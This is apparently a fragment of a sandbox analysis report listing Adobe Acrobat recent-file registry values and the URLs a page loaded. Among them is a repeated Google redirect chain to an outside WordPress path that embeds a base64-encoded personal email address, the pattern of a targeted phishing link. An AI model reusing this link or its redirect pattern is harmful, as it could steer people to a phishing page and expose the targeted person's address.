There are 11 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
aFS
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tDIText
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileName
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileSource
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sFileAncestors
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDI
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDate
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uFileSize
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uPageCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sAssetId
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
bisSharedFile
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
aFS
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tDIText
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tFileName
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sFileAncestors
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDI
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDate
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uFileSize
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uPageCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
bisSharedFile
|
There are 10 hidden registries, click here to show them.
DOM / HTML
URL
|
Malicious
|
|
---|---|---|
https://www.google.com/sorry/index?continue=https://google.com/amp/s/jlaempireconstruction.com/wp/BaMZL/347412589/bGNpcHJpYW5vQHNlY3VydXN0ZWNobm9sb2dpZXMuY29t&q=EgS_YOPCGPPL4a8GIjDVrdwzQ-0hjRF22xb0wxAzb59XWSpawbX4F2KDCKXzQlwlus09tiasbJjnYpIYAbcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
|
||
https://www.google.com/sorry/index?continue=https://google.com/amp/s/jlaempireconstruction.com/wp/BaMZL/347412589/bGNpcHJpYW5vQHNlY3VydXN0ZWNobm9sb2dpZXMuY29t&q=EgS_YOPCGPPL4a8GIjDVrdwzQ-0hjRF22xb0wxAzb59XWSpawbX4F2KDCKXzQlwlus09tiasbJjnYpIYAbcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
|
||
about:blank
|
||
https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=YurWEBlMIwR4EqFPncmQTkxQ&size=normal&s=ymv06AkaMFd0veBmjRDIVYVI_YeVSY6m_bUS7l3IZjcNtbecDqHX8o3-DvDJTD8NDMtxLVXxr6ne9kK5GVvbZkxaMBsK0EWI6M2Ph48iiwUbaF8OJ6bKP0DSLvYz0-ZE3Ml0FhBk5JWn36oMAWkfxbR5bATohxwjvPT3cEWcLn_JV13dQLtCxtpk1-JhyQs8fTlRFZVIdV66Wt7-ry9-7hOrYb3n7U-L2dRq_4ARXyxJRTRaoJxnG5mfs3KdNtNIbKua2IIWQwVCNx103mwV3pelVgWVMsY&cb=i9hjyeehzqwk
|
||
https://www.google.com/recaptcha/api2/bframe?hl=en&v=YurWEBlMIwR4EqFPncmQTkxQ&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b
|